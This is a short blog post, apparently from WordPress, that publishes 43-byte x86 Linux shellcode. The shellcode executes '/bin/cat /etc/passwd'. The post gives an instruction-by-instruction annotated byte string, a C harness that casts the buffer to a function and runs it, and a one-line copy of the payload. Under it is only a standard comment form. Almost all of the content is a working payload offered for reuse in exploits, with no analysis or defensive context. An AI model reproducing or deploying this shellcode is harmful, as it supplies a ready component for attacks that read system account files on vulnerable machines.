break a time, with break the c0de…

/bin/cat /etc/passwd 43 bytes x86 linux


/*
Title  : /bin/cat /etc/passwd 43 bytes x86 linux
Name   : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date   : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

#include <stdio.h>

char *shellcode=
		"\x31\xc0" 		// xorl %eax,%eax
		"\xb0\x0b" 		// mov $0xb,%al
		"\x99" 			// cdq
		"\x52" 			// push edx
		"\x68\x2f\x63\x61\x74" 	// push dword 0x7461632f
		"\x68\x2f\x62\x69\x6e" 	// push dword 0x6e69622f
		"\x89\xe3" 		// mov ebx,esp
		"\x52" 			// push edx
		"\x68\x73\x73\x77\x64" 	// push dword 0x64777373
		"\x68\x2f\x2f\x70\x61" 	// push dword 0x61702f2f
		"\x68\x2f\x65\x74\x63" 	// push dword 0x6374652f
		"\x89\xe1" 		// mov ecx,esp
		"\x52" 			// push edx
		"\x51" 			// push ecx
		"\x53" 			// push ebx
		"\x89\xe1" 		// mov ecx,esp
		"\xcd\x80"; 		// int 80h

int main()
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void (*)()) shellcode)();

return 0;
}


/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s